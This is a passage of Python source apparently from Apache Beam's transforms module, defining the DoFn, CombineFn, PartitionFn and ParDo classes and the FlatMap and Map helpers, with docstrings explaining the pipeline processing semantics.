arguments. This is similar to ``inspect.getfullargspec()``'s results, except
it doesn't include bound arguments and may follow function wrappers.
"""
signature = get_signature(f)
# Fall back on funcsigs if inspect module doesn't have 'Parameter'; prefer
# inspect.Parameter over funcsigs.Parameter if both are available.
try:
parameter = inspect.Parameter
except AttributeError:
parameter = funcsigs.Parameter
# TODO(BEAM-5878) support kwonlyargs on Python 3.
_SUPPORTED_ARG_TYPES = [
parameter.POSITIONAL_ONLY, parameter.POSITIONAL_OR_KEYWORD
]
args = [
name for name,
p in signature.parameters.items() if p.kind in _SUPPORTED_ARG_TYPES
]
defaults = [
p.default for p in signature.parameters.values()
if p.kind in _SUPPORTED_ARG_TYPES and p.default is not p.empty
]
return args, defaults
class RunnerAPIPTransformHolder(PTransform):
"""A `PTransform` that holds a runner API `PTransform` proto.
This is used for transforms, for which corresponding objects
cannot be initialized in Python SDK. For example, for `ParDo` transforms for
remote SDKs that may be available in Python SDK transform graph when expanding
a cross-language transform since a Python `ParDo` object cannot be generated
without a serialized Python `DoFn` object.
"""
def __init__(self, proto, context):
self._proto = proto
self._context = context
def proto(self):
"""Runner API payload for a `PTransform`"""
return self._proto
def to_runner_api(self, context, has_parts=False):
# TODO(BEAM-7850): no need to copy around Environment if it is a direct
# attribute of PTransform.
id_to_proto_map = self._context.environments.get_id_to_proto_map()
for env_id in id_to_proto_map:
if env_id not in context.environments:
context.environments.put_proto(env_id, id_to_proto_map[env_id])
else:
env1 = id_to_proto_map[env_id]
env2 = context.environments[env_id]
assert env1.urn == env2.to_runner_api(context).urn, (
'Expected environments with the same ID to be equal but received '
'environments with different URNs '
'%r and %r',
env1.urn, env2.to_runner_api(context).urn)
assert env1.payload == env2.to_runner_api(context).payload, (
'Expected environments with the same ID to be equal but received '
'environments with different payloads '
'%r and %r',
env1.payload, env2.to_runner_api(context).payload)
return self._proto
def get_restriction_coder(self):
# TODO(BEAM-7172): support external transforms that are SDFs.
return None
class WatermarkEstimatorProvider(object):
"""Provides methods for generating WatermarkEstimator.
This class should be implemented if wanting to providing output_watermark
information within an SDF.
In order to make an SDF.process() access to the typical WatermarkEstimator,
the SDF author should pass a DoFn.WatermarkEstimatorParam with a default value
of one WatermarkEstimatorProvider instance.
"""
def initial_estimator_state(self, element, restriction):
"""Returns the initial state of the WatermarkEstimator with given element
and restriction.
This function is called by the system.
"""
raise NotImplementedError
def create_watermark_estimator(self, estimator_state):
"""Create a new WatermarkEstimator based on the state. The state is
typically useful when resuming processing an element.
"""
raise NotImplementedError
def estimator_state_coder(self):
return coders.registry.get_coder(object)
class _DoFnParam(object):
"""DoFn parameter."""
def __init__(self, param_id):
self.param_id = param_id
def __eq__(self, other):
if type(self) == type(other):
return self.param_id == other.param_id
return False
def __ne__(self, other):
# TODO(BEAM-5949): Needed for Python 2 compatibility.
return not self == other
def __hash__(self):
return hash(self.param_id)
def __repr__(self):
return self.param_id
class _RestrictionDoFnParam(_DoFnParam):
"""Restriction Provider DoFn parameter."""
def __init__(self, restriction_provider):
# type: (RestrictionProvider) -> None
if not isinstance(restriction_provider, RestrictionProvider):
raise ValueError(
'DoFn.RestrictionParam expected RestrictionProvider object.')
self.restriction_provider = restriction_provider
self.param_id = (
'RestrictionParam(%s)' % restriction_provider.__class__.__name__)
class _StateDoFnParam(_DoFnParam):
"""State DoFn parameter."""
def __init__(self, state_spec):
# type: (StateSpec) -> None
if not isinstance(state_spec, StateSpec):
raise ValueError("DoFn.StateParam expected StateSpec object.")
self.state_spec = state_spec
self.param_id = 'StateParam(%s)' % state_spec.name
class _TimerDoFnParam(_DoFnParam):
"""Timer DoFn parameter."""
def __init__(self, timer_spec):
# type: (TimerSpec) -> None
if not isinstance(timer_spec, TimerSpec):
raise ValueError("DoFn.TimerParam expected TimerSpec object.")
self.timer_spec = timer_spec
self.param_id = 'TimerParam(%s)' % timer_spec.name
class _BundleFinalizerParam(_DoFnParam):
"""Bundle Finalization DoFn parameter."""
def __init__(self):
self._callbacks = []
self.param_id = "FinalizeBundle"
def register(self, callback):
self._callbacks.append(callback)
# Log errors when calling callback to make sure all callbacks get called
# though there are errors. And errors should not fail pipeline.
def finalize_bundle(self):
for callback in self._callbacks:
try:
callback()
except Exception as e:
_LOGGER.warning("Got exception from finalization call: %s", e)
def has_callbacks(self):
return len(self._callbacks) > 0
def reset(self):
del self._callbacks[:]
class _WatermarkEstimatorParam(_DoFnParam):
"""WatermarkEstomator DoFn parameter."""
def __init__(self, watermark_estimator_provider):
# type: (WatermarkEstimatorProvider) -> None
if not isinstance(watermark_estimator_provider, WatermarkEstimatorProvider):
raise ValueError(
'DoFn._WatermarkEstimatorParam expected'
'WatermarkEstimatorProvider object.')
self.watermark_estimator_provider = watermark_estimator_provider
self.param_id = 'WatermarkEstimatorProvider'
class DoFn(WithTypeHints, HasDisplayData, urns.RunnerApiFn):
"""A function object used by a transform with custom processing.
The ParDo transform is such a transform. The ParDo.apply
method will take an object of type DoFn and apply it to all elements of a
PCollection object.
In order to have concrete DoFn objects one has to subclass from DoFn and
define the desired behavior (start_bundle/finish_bundle and process) or wrap a
callable object using the CallableWrapperDoFn class.
"""
# Parameters that can be used in the .process() method.
ElementParam = _DoFnParam('ElementParam')
SideInputParam = _DoFnParam('SideInputParam')
TimestampParam = _DoFnParam('TimestampParam')
WindowParam = _DoFnParam('WindowParam')
PaneInfoParam = _DoFnParam('PaneInfoParam')
WatermarkEstimatorParam = _WatermarkEstimatorParam
BundleFinalizerParam = _BundleFinalizerParam
KeyParam = _DoFnParam('KeyParam')
# Parameters to access state and timers. Not restricted to use only in the
# .process() method. Usage: DoFn.StateParam(state_spec),
# DoFn.TimerParam(timer_spec), DoFn.TimestampParam, DoFn.WindowParam,
# DoFn.KeyParam
StateParam = _StateDoFnParam
TimerParam = _TimerDoFnParam
DoFnProcessParams = [
ElementParam,
SideInputParam,
TimestampParam,
WindowParam,
WatermarkEstimatorParam,
PaneInfoParam,
BundleFinalizerParam,
KeyParam,
StateParam,
TimerParam
]
RestrictionParam = _RestrictionDoFnParam
@staticmethod
def from_callable(fn):
return CallableWrapperDoFn(fn)
def default_label(self):
return self.__class__.__name__
def process(self, element, *args, **kwargs):
"""Method to use for processing elements.
This is invoked by ``DoFnRunner`` for each element of a input
``PCollection``.
If specified, following default arguments are used by the ``DoFnRunner`` to
be able to pass the parameters correctly.
``DoFn.ElementParam``: element to be processed, should not be mutated.
``DoFn.SideInputParam``: a side input that may be used when processing.
``DoFn.TimestampParam``: timestamp of the input element.
``DoFn.WindowParam``: ``Window`` the input element belongs to.
``DoFn.TimerParam``: a ``userstate.RuntimeTimer`` object defined by the spec
of the parameter.
``DoFn.StateParam``: a ``userstate.RuntimeState`` object defined by the spec
of the parameter.
``DoFn.KeyParam``: key associated with the element.
``DoFn.RestrictionParam``: an ``iobase.RestrictionTracker`` will be
provided here to allow treatment as a Splittable ``DoFn``. The restriction
tracker will be derived from the restriction provider in the parameter.
``DoFn.WatermarkEstimatorParam``: a function that can be used to track
output watermark of Splittable ``DoFn`` implementations.
Args:
element: The element to be processed
*args: side inputs
**kwargs: other keyword arguments.
Returns:
An Iterable of output elements or None.
"""
raise NotImplementedError
def setup(self):
"""Called to prepare an instance for processing bundles of elements.
This is a good place to initialize transient in-memory resources, such as
network connections. The resources can then be disposed in
``DoFn.teardown``.
"""
pass
def start_bundle(self):
"""Called before a bundle of elements is processed on a worker.
Elements to be processed are split into bundles and distributed
to workers. Before a worker calls process() on the first element
of its bundle, it calls this method.
"""
pass
def finish_bundle(self):
"""Called after a bundle of elements is processed on a worker.
"""
pass
def teardown(self):
"""Called to use to clean up this instance before it is discarded.
A runner will do its best to call this method on any given instance to
prevent leaks of transient resources, however, there may be situations where
this is impossible (e.g. process crash, hardware failure, etc.) or
unnecessary (e.g. the pipeline is shutting down and the process is about to
be killed anyway, so all transient resources will be released automatically
by the OS). In these cases, the call may not happen. It will also not be
retried, because in such situations the DoFn instance no longer exists, so
there's no instance to retry it on.
Thus, all work that depends on input elements, and all externally important
side effects, must be performed in ``DoFn.process`` or
``DoFn.finish_bundle``.
"""
pass
def get_function_arguments(self, func):
return get_function_arguments(self, func)
def default_type_hints(self):
fn_type_hints = typehints.decorators.IOTypeHints.from_callable(self.process)
if fn_type_hints is not None:
try:
fn_type_hints = fn_type_hints.strip_iterable()
except ValueError as e:
raise ValueError('Return value not iterable: %s: %s' % (self, e))
# Prefer class decorator type hints for backwards compatibility.
return get_type_hints(self.__class__).with_defaults(fn_type_hints)
# TODO(sourabhbajaj): Do we want to remove the responsibility of these from
# the DoFn or maybe the runner
def infer_output_type(self, input_type):
# TODO(BEAM-8247): Side inputs types.
# TODO(robertwb): Assert compatibility with input type hint?
return self._strip_output_annotations(
trivial_inference.infer_return_type(self.process, [input_type]))
def _strip_output_annotations(self, type_hint):
annotations = (TimestampedValue, WindowedValue, pvalue.TaggedOutput)
# TODO(robertwb): These should be parameterized types that the
# type inferencer understands.
if (type_hint in annotations or
trivial_inference.element_type(type_hint) in annotations):
return typehints.Any
return type_hint
def _process_argspec_fn(self):
"""Returns the Python callable that will eventually be invoked.
This should ideally be the user-level function that is called with
the main and (if any) side inputs, and is used to relate the type
hint parameters with the input parameters (e.g., by argument name).
"""
return self.process
urns.RunnerApiFn.register_pickle_urn(python_urns.PICKLED_DOFN)
def _fn_takes_side_inputs(fn):
try:
signature = get_signature(fn)
except TypeError:
# We can't tell; maybe it does.
return True
return (
len(signature.parameters) > 1 or any(
p.kind == p.VAR_POSITIONAL or p.kind == p.VAR_KEYWORD
for p in signature.parameters.values()))
class CallableWrapperDoFn(DoFn):
"""For internal use only; no backwards-compatibility guarantees.
A DoFn (function) object wrapping a callable object.
The purpose of this class is to conveniently wrap simple functions and use
them in transforms.
"""
def __init__(self, fn, fullargspec=None):
"""Initializes a CallableWrapperDoFn object wrapping a callable.
Args:
fn: A callable object.
Raises:
TypeError: if fn parameter is not a callable type.
"""
if not callable(fn):
raise TypeError('Expected a callable object instead of: %r' % fn)
self._fn = fn
self._fullargspec = fullargspec
if isinstance(
fn, (types.BuiltinFunctionType, types.MethodType, types.FunctionType)):
self.process = fn
else:
# For cases such as set / list where fn is callable but not a function
self.process = lambda element: fn(element)
super(CallableWrapperDoFn, self).__init__()
def display_data(self):
# If the callable has a name, then it's likely a function, and
# we show its name.
# Otherwise, it might be an instance of a callable class. We
# show its class.
display_data_value = (
self._fn.__name__
if hasattr(self._fn, '__name__') else self._fn.__class__)
return {
'fn': DisplayDataItem(display_data_value, label='Transform Function')
}
def __repr__(self):
return 'CallableWrapperDoFn(%s)' % self._fn
def default_type_hints(self):
fn_type_hints = typehints.decorators.IOTypeHints.from_callable(self._fn)
type_hints = get_type_hints(self._fn).with_defaults(fn_type_hints)
# The fn's output type should be iterable. Strip off the outer
# container type due to the 'flatten' portion of FlatMap/ParDo.
try:
type_hints = type_hints.strip_iterable()
except ValueError as e:
# TODO(BEAM-8466): Raise exception here if using stricter type checking.
_LOGGER.warning('%s: %s', self.display_data()['fn'].value, e)
return type_hints
def infer_output_type(self, input_type):
return self._strip_output_annotations(
trivial_inference.infer_return_type(self._fn, [input_type]))
def _process_argspec_fn(self):
return getattr(self._fn, '_argspec_fn', self._fn)
def _inspect_process(self):
if self._fullargspec:
return self._fullargspec
else:
return get_function_args_defaults(self._process_argspec_fn())
class CombineFn(WithTypeHints, HasDisplayData, urns.RunnerApiFn):
"""A function object used by a Combine transform with custom processing.
A CombineFn specifies how multiple values in all or part of a PCollection can
be merged into a single value---essentially providing the same kind of
information as the arguments to the Python "reduce" builtin (except for the
input argument, which is an instance of CombineFnProcessContext). The
combining process proceeds as follows:
1. Input values are partitioned into one or more batches.
2. For each batch, the create_accumulator method is invoked to create a fresh
initial "accumulator" value representing the combination of zero values.
3. For each input value in the batch, the add_input method is invoked to
combine more values with the accumulator for that batch.
4. The merge_accumulators method is invoked to combine accumulators from
separate batches into a single combined output accumulator value, once all
of the accumulators have had all the input value in their batches added to
them. This operation is invoked repeatedly, until there is only one
accumulator value left.
5. The extract_output operation is invoked on the final accumulator to get
the output value.
Note: If this **CombineFn** is used with a transform that has defaults,
**apply** will be called with an empty list at expansion time to get the
default value.
"""
def default_label(self):
return self.__class__.__name__
def create_accumulator(self, *args, **kwargs):
"""Return a fresh, empty accumulator for the combine operation.
Args:
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
raise NotImplementedError(str(self))
def add_input(self, mutable_accumulator, element, *args, **kwargs):
"""Return result of folding element into accumulator.
CombineFn implementors must override add_input.
Args:
mutable_accumulator: the current accumulator,
may be modified and returned for efficiency
element: the element to add, should not be mutated
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
raise NotImplementedError(str(self))
def add_inputs(self, mutable_accumulator, elements, *args, **kwargs):
"""Returns the result of folding each element in elements into accumulator.
This is provided in case the implementation affords more efficient
bulk addition of elements. The default implementation simply loops
over the inputs invoking add_input for each one.
Args:
mutable_accumulator: the current accumulator,
may be modified and returned for efficiency
elements: the elements to add, should not be mutated
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
for element in elements:
mutable_accumulator =\
self.add_input(mutable_accumulator, element, *args, **kwargs)
return mutable_accumulator
def merge_accumulators(self, accumulators, *args, **kwargs):
"""Returns the result of merging several accumulators
to a single accumulator value.
Args:
accumulators: the accumulators to merge.
Only the first accumulator may be modified and returned for efficiency;
the other accumulators should not be mutated, because they may be
shared with other code and mutating them could lead to incorrect
results or data corruption.
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
raise NotImplementedError(str(self))
def compact(self, accumulator, *args, **kwargs):
"""Optionally returns a more compact represenation of the accumulator.
This is called before an accumulator is sent across the wire, and can
be useful in cases where values are buffered or otherwise lazily
kept unprocessed when added to the accumulator. Should return an
equivalent, though possibly modified, accumulator.
By default returns the accumulator unmodified.
Args:
accumulator: the current accumulator
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
return accumulator
def extract_output(self, accumulator, *args, **kwargs):
"""Return result of converting accumulator into the output value.
Args:
accumulator: the final accumulator value computed by this CombineFn
for the entire input key or PCollection. Can be modified for
efficiency.
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
raise NotImplementedError(str(self))
def apply(self, elements, *args, **kwargs):
"""Returns result of applying this CombineFn to the input values.
Args:
elements: the set of values to combine.
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
return self.extract_output(
self.add_inputs(
self.create_accumulator(*args, **kwargs), elements, *args,
**kwargs),
*args,
**kwargs)
def for_input_type(self, input_type):
"""Returns a specialized implementation of self, if it exists.
Otherwise, returns self.
Args:
input_type: the type of input elements.
"""
return self
@staticmethod
def from_callable(fn):
return CallableWrapperCombineFn(fn)
@staticmethod
def maybe_from_callable(fn, has_side_inputs=True):
# type: (typing.Union[CombineFn, typing.Callable], bool) -> CombineFn
if isinstance(fn, CombineFn):
return fn
elif callable(fn) and not has_side_inputs:
return NoSideInputsCallableWrapperCombineFn(fn)
elif callable(fn):
return CallableWrapperCombineFn(fn)
else:
raise TypeError('Expected a CombineFn or callable, got %r' % fn)
def get_accumulator_coder(self):
return coders.registry.get_coder(object)
urns.RunnerApiFn.register_pickle_urn(python_urns.PICKLED_COMBINE_FN)
class _ReiterableChain(object):
"""Like itertools.chain, but allowing re-iteration."""
def __init__(self, iterables):
self.iterables = iterables
def __iter__(self):
for iterable in self.iterables:
for item in iterable:
yield item
def __bool__(self):
for iterable in self.iterables:
for _ in iterable:
return True
return False
class CallableWrapperCombineFn(CombineFn):
"""For internal use only; no backwards-compatibility guarantees.
A CombineFn (function) object wrapping a callable object.
The purpose of this class is to conveniently wrap simple functions and use
them in Combine transforms.
"""
_DEFAULT_BUFFER_SIZE = 10
def __init__(self, fn, buffer_size=_DEFAULT_BUFFER_SIZE):
"""Initializes a CallableFn object wrapping a callable.
Args:
fn: A callable object that reduces elements of an iterable to a single
value (like the builtins sum and max). This callable must be capable of
receiving the kind of values it generates as output in its input, and
for best results, its operation must be commutative and associative.
Raises:
TypeError: if fn parameter is not a callable type.
"""
if not callable(fn):
raise TypeError('Expected a callable object instead of: %r' % fn)
super(CallableWrapperCombineFn, self).__init__()
self._fn = fn
self._buffer_size = buffer_size
def display_data(self):
return {'fn_dd': self._fn}
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, self._fn)
def create_accumulator(self, *args, **kwargs):
return []
def add_input(self, accumulator, element, *args, **kwargs):
accumulator.append(element)
if len(accumulator) > self._buffer_size:
accumulator = [self._fn(accumulator, *args, **kwargs)]
return accumulator
def add_inputs(self, accumulator, elements, *args, **kwargs):
accumulator.extend(elements)
if len(accumulator) > self._buffer_size:
accumulator = [self._fn(accumulator, *args, **kwargs)]
return accumulator
def merge_accumulators(self, accumulators, *args, **kwargs):
return [self._fn(_ReiterableChain(accumulators), *args, **kwargs)]
def compact(self, accumulator, *args, **kwargs):
if len(accumulator) <= 1:
return accumulator
else:
return [self._fn(accumulator, *args, **kwargs)]
def extract_output(self, accumulator, *args, **kwargs):
return self._fn(accumulator, *args, **kwargs)
def default_type_hints(self):
fn_hints = get_type_hints(self._fn)
if fn_hints.input_types is None:
return fn_hints
else:
# fn(Iterable[V]) -> V becomes CombineFn(V) -> V
input_args, input_kwargs = fn_hints.input_types
if not input_args:
if len(input_kwargs) == 1:
input_args, input_kwargs = tuple(input_kwargs.values()), {}
else:
raise TypeError('Combiner input type must be specified positionally.')
if not is_consistent_with(input_args[0],
typehints.Iterable[typehints.Any]):
raise TypeCheckError(
'All functions for a Combine PTransform must accept a '
'single argument compatible with: Iterable[Any]. '
'Instead a function with input type: %s was received.' %
input_args[0])
input_args = (element_type(input_args[0]), ) + input_args[1:]
# TODO(robertwb): Assert output type is consistent with input type?
return fn_hints.with_input_types(*input_args, **input_kwargs)
def for_input_type(self, input_type):
# Avoid circular imports.
from apache_beam.transforms import cy_combiners
if self._fn is any:
return cy_combiners.AnyCombineFn()
elif self._fn is all:
return cy_combiners.AllCombineFn()
else:
known_types = {
(sum, int): cy_combiners.SumInt64Fn(),
(min, int): cy_combiners.MinInt64Fn(),
(max, int): cy_combiners.MaxInt64Fn(),
(sum, float): cy_combiners.SumFloatFn(),
(min, float): cy_combiners.MinFloatFn(),
(max, float): cy_combiners.MaxFloatFn(),
}
return known_types.get((self._fn, input_type), self)
class NoSideInputsCallableWrapperCombineFn(CallableWrapperCombineFn):
"""For internal use only; no backwards-compatibility guarantees.
A CombineFn (function) object wrapping a callable object with no side inputs.
This is identical to its parent, but avoids accepting and passing *args
and **kwargs for efficiency as they are known to be empty.
"""
def create_accumulator(self):
return []
def add_input(self, accumulator, element):
accumulator.append(element)
if len(accumulator) > self._buffer_size:
accumulator = [self._fn(accumulator)]
return accumulator
def add_inputs(self, accumulator, elements):
accumulator.extend(elements)
if len(accumulator) > self._buffer_size:
accumulator = [self._fn(accumulator)]
return accumulator
def merge_accumulators(self, accumulators):
return [self._fn(_ReiterableChain(accumulators))]
def compact(self, accumulator):
if len(accumulator) <= 1:
return accumulator
else:
return [self._fn(accumulator)]
def extract_output(self, accumulator):
return self._fn(accumulator)
class PartitionFn(WithTypeHints):
"""A function object used by a Partition transform.
A PartitionFn specifies how individual values in a PCollection will be placed
into separate partitions, indexed by an integer.
"""
def default_label(self):
return self.__class__.__name__
def partition_for(self, element, num_partitions, *args, **kwargs):
# type: (T, int, *typing.Any, **typing.Any) -> int
"""Specify which partition will receive this element.
Args:
element: An element of the input PCollection.
num_partitions: Number of partitions, i.e., output PCollections.
*args: optional parameters and side inputs.
**kwargs: optional parameters and side inputs.
Returns:
An integer in [0, num_partitions).
"""
pass
class CallableWrapperPartitionFn(PartitionFn):
"""For internal use only; no backwards-compatibility guarantees.
A PartitionFn object wrapping a callable object.
Instances of this class wrap simple functions for use in Partition operations.
"""
def __init__(self, fn):
"""Initializes a PartitionFn object wrapping a callable.
Args:
fn: A callable object, which should accept the following arguments:
element - element to assign to a partition.
num_partitions - number of output partitions.
and may accept additional arguments and side inputs.
Raises:
TypeError: if fn is not a callable type.
"""
if not callable(fn):
raise TypeError('Expected a callable object instead of: %r' % fn)
self._fn = fn
def partition_for(self, element, num_partitions, *args, **kwargs):
# type: (T, int, *typing.Any, **typing.Any) -> int
return self._fn(element, num_partitions, *args, **kwargs)
class ParDo(PTransformWithSideInputs):
"""A :class:`ParDo` transform.
Processes an input :class:`~apache_beam.pvalue.PCollection` by applying a
:class:`DoFn` to each element and returning the accumulated results into an
output :class:`~apache_beam.pvalue.PCollection`. The type of the elements is
not fixed as long as the :class:`DoFn` can deal with it. In reality the type
is restrained to some extent because the elements sometimes must be persisted
to external storage. See the :meth:`.expand()` method comments for a
detailed description of all possible arguments.
Note that the :class:`DoFn` must return an iterable for each element of the
input :class:`~apache_beam.pvalue.PCollection`. An easy way to do this is to
use the ``yield`` keyword in the process method.
Args:
pcoll (~apache_beam.pvalue.PCollection):
a :class:`~apache_beam.pvalue.PCollection` to be processed.
fn (`typing.Union[DoFn, typing.Callable]`): a :class:`DoFn` object to be
applied to each element of **pcoll** argument, or a Callable.
*args: positional arguments passed to the :class:`DoFn` object.
**kwargs: keyword arguments passed to the :class:`DoFn` object.
Note that the positional and keyword arguments will be processed in order
to detect :class:`~apache_beam.pvalue.PCollection` s that will be computed as
side inputs to the transform. During pipeline execution whenever the
:class:`DoFn` object gets executed (its :meth:`DoFn.process()` method gets
called) the :class:`~apache_beam.pvalue.PCollection` arguments will be
replaced by values from the :class:`~apache_beam.pvalue.PCollection` in the
exact positions where they appear in the argument lists.
"""
def __init__(self, fn, *args, **kwargs):
super(ParDo, self).__init__(fn, *args, **kwargs)
# TODO(robertwb): Change all uses of the dofn attribute to use fn instead.
self.dofn = self.fn
self.output_tags = set() # type: typing.Set[str]
if not isinstance(self.fn, DoFn):
raise TypeError('ParDo must be called with a DoFn instance.')
# Validate the DoFn by creating a DoFnSignature
from apache_beam.runners.common import DoFnSignature
self._signature = DoFnSignature(self.fn)
def default_type_hints(self):
return self.fn.get_type_hints()
def infer_output_type(self, input_type):
return trivial_inference.element_type(self.fn.infer_output_type(input_type))
def make_fn(self, fn, has_side_inputs):
if isinstance(fn, DoFn):
return fn
return CallableWrapperDoFn(fn)
def _process_argspec_fn(self):
return self.fn._process_argspec_fn()
def display_data(self):
return {
'fn': DisplayDataItem(self.fn.__class__, label='Transform Function'),
'fn_dd': self.fn
}
def expand(self, pcoll):
# In the case of a stateful DoFn, warn if the key coder is not
# deterministic.
if self._signature.is_stateful_dofn():
kv_type_hint = pcoll.element_type
if kv_type_hint and kv_type_hint != typehints.Any:
coder = coders.registry.get_coder(kv_type_hint)
if not coder.is_kv_coder():
raise ValueError(
'Input elements to the transform %s with stateful DoFn must be '
'key-value pairs.' % self)
key_coder = coder.key_coder()
else:
key_coder = coders.registry.get_coder(typehints.Any)
if not key_coder.is_deterministic():
_LOGGER.warning(
'Key coder %s for transform %s with stateful DoFn may not '
'be deterministic. This may cause incorrect behavior for complex '
'key types. Consider adding an input type hint for this transform.',
key_coder,
self)
return pvalue.PCollection.from_(pcoll)
def with_outputs(self, *tags, **main_kw):
"""Returns a tagged tuple allowing access to the outputs of a
:class:`ParDo`.
The resulting object supports access to the
:class:`~apache_beam.pvalue.PCollection` associated with a tag
(e.g. ``o.tag``, ``o[tag]``) and iterating over the available tags
(e.g. ``for tag in o: ...``).
Args:
*tags: if non-empty, list of valid tags. If a list of valid tags is given,
it will be an error to use an undeclared tag later in the pipeline.
**main_kw: dictionary empty or with one key ``'main'`` defining the tag to
be used for the main output (which will not have a tag associated with
it).
Returns:
~apache_beam.pvalue.DoOutputsTuple: An object of type
:class:`~apache_beam.pvalue.DoOutputsTuple` that bundles together all
the outputs of a :class:`ParDo` transform and allows accessing the
individual :class:`~apache_beam.pvalue.PCollection` s for each output
using an ``object.tag`` syntax.
Raises:
TypeError: if the **self** object is not a
:class:`~apache_beam.pvalue.PCollection` that is the result of a
:class:`ParDo` transform.
ValueError: if **main_kw** contains any key other than
``'main'``.
"""
main_tag = main_kw.pop('main', None)
if main_kw:
raise ValueError('Unexpected keyword arguments: %s' % list(main_kw))
return _MultiParDo(self, tags, main_tag)
def _pardo_fn_data(self):
si_tags_and_types = None
windowing = None
return self.fn, self.args, self.kwargs, si_tags_and_types, windowing
def to_runner_api_parameter(self, context):
# type: (PipelineContext) -> typing.Tuple[str, message.Message]
assert isinstance(self, ParDo), \
"expected instance of ParDo, but got %s" % self.__class__
picked_pardo_fn_data = pickler.dumps(self._pardo_fn_data())
state_specs, timer_specs = userstate.get_dofn_specs(self.fn)
if state_specs or timer_specs:
context.add_requirement(
common_urns.requirements.REQUIRES_STATEFUL_PROCESSING.urn)
from apache_beam.runners.common import DoFnSignature
sig = DoFnSignature(self.fn)
is_splittable = sig.is_splittable_dofn()
if is_splittable:
restriction_coder = sig.get_restriction_coder()
restriction_coder_id = context.coders.get_id(
restriction_coder) # type: typing.Optional[str]
else:
restriction_coder_id = None
has_bundle_finalization = sig.has_bundle_finalization()
if has_bundle_finalization:
context.add_requirement(
common_urns.requirements.REQUIRES_BUNDLE_FINALIZATION.urn)
return (
common_urns.primitives.PAR_DO.urn,
beam_runner_api_pb2.ParDoPayload(
do_fn=beam_runner_api_pb2.FunctionSpec(
urn=python_urns.PICKLED_DOFN_INFO,
payload=picked_pardo_fn_data),
splittable=is_splittable,
requests_finalization=has_bundle_finalization,
restriction_coder_id=restriction_coder_id,
state_specs={
spec.name: spec.to_runner_api(context)
for spec in state_specs
},
timer_specs={
spec.name: spec.to_runner_api(context)
for spec in timer_specs
},
# It'd be nice to name these according to their actual
# names/positions in the orignal argument list, but such a
# transformation is currently irreversible given how
# remove_objects_from_args and insert_values_in_args
# are currently implemented.
side_inputs={
"side%s" % ix: si.to_runner_api(context)
for ix,
si in enumerate(self.side_inputs)
}))
@staticmethod
@PTransform.register_urn(
common_urns.primitives.PAR_DO.urn, beam_runner_api_pb2.ParDoPayload)
def from_runner_api_parameter(pardo_payload, context):
assert pardo_payload.do_fn.urn == python_urns.PICKLED_DOFN_INFO
fn, args, kwargs, si_tags_and_types, windowing = pickler.loads(
pardo_payload.do_fn.payload)
if si_tags_and_types:
raise NotImplementedError('explicit side input data')
elif windowing:
raise NotImplementedError('explicit windowing')
result = ParDo(fn, *args, **kwargs)
# This is an ordered list stored as a dict (see the comments in
# to_runner_api_parameter above).
indexed_side_inputs = [(
get_sideinput_index(tag),
pvalue.AsSideInput.from_runner_api(si, context)) for tag,
si in pardo_payload.side_inputs.items()]
result.side_inputs = [si for _, si in sorted(indexed_side_inputs)]
return result
def runner_api_requires_keyed_input(self):
return userstate.is_stateful_dofn(self.fn)
def get_restriction_coder(self):
"""Returns `restriction coder if `DoFn` of this `ParDo` is a SDF.
Returns `None` otherwise.
"""
from apache_beam.runners.common import DoFnSignature
return DoFnSignature(self.fn).get_restriction_coder()
class _MultiParDo(PTransform):
def __init__(self, do_transform, tags, main_tag):
super(_MultiParDo, self).__init__(do_transform.label)
self._do_transform = do_transform
self._tags = tags
self._main_tag = main_tag
def expand(self, pcoll):
_ = pcoll | self._do_transform
return pvalue.DoOutputsTuple(
pcoll.pipeline, self._do_transform, self._tags, self._main_tag)
def FlatMap(fn, *args, **kwargs): # pylint: disable=invalid-name
""":func:`FlatMap` is like :class:`ParDo` except it takes a callable to
specify the transformation.
The callable must return an iterable for each element of the input
:class:`~apache_beam.pvalue.PCollection`. The elements of these iterables will
be flattened into the output :class:`~apache_beam.pvalue.PCollection`.
Args:
fn (callable): a callable object.
*args: positional arguments passed to the transform callable.
**kwargs: keyword arguments passed to the transform callable.
Returns:
~apache_beam.pvalue.PCollection:
A :class:`~apache_beam.pvalue.PCollection` containing the
:func:`FlatMap` outputs.
Raises:
TypeError: If the **fn** passed as argument is not a callable.
Typical error is to pass a :class:`DoFn` instance which is supported only
for :class:`ParDo`.
"""
label = 'FlatMap(%s)' % ptransform.label_from_callable(fn)
if not callable(fn):
raise TypeError(
'FlatMap can be used only with callable objects. '
'Received %r instead.' % (fn))
pardo = ParDo(CallableWrapperDoFn(fn), *args, **kwargs)
pardo.label = label
return pardo
def Map(fn, *args, **kwargs): # pylint: disable=invalid-name
""":func:`Map` is like :func:`FlatMap` except its callable returns only a
single element.
Args:
fn (callable): a callable object.
*args: positional arguments passed to the transform callable.
**kwargs: keyword arguments passed to the transform callable.
Returns:
~apache_beam.pvalue.PCollection:
A :class:`~apache_beam.pvalue.PCollection` containing the
:func:`Map` outputs.
Raises:
TypeError: If the **fn** passed as argument is not a callable.
Typical error is to pass a :class:`DoFn` instance which is supported only
for :class:`ParDo`.
"""
if not callable(fn):
raise TypeError(
'Map can be used only with callable objects. '
'Received %r instead.' % (fn))
if _fn_takes_side_inputs(fn):
wrapper = lambda x, *args, **kwargs: [fn(x, *args, **kwargs)]
else:
wrapper = lambda x: [fn(x)]
label = 'Map(%s)' % ptransform.label_from_callable(fn)
# TODO. What about callable classes?
if hasattr(fn, '__name__'):
wrapper.__name__ = fn.__name__
# Proxy the type-hint information from the original function to this new
# wrapped function.
type_hints = get_type_hints(fn).with_defaults(
typehints.decorators.IOTypeHints.from_callable(fn))
if type_hints.input_types is not None:
wrapper = with_input_types(
*type_hints.input_types[0], **type_hints.input_types[1])(
wrapper)
output_hint = type_hints.simple_output_type(label)
if output_hint:
wrapper = with_output_types(typehints.Iterable[output_hint])(wrapper)
# pylint: disable=protected-access
wrapper._argspec_fn = fn
# pylint: enable=protected-access
pardo = FlatMap(wrapper, *args, **kwargs)
pardo.label = label
return pardo
def MapTuple(fn, *args, **kwargs): # pylint: disable=invalid-name
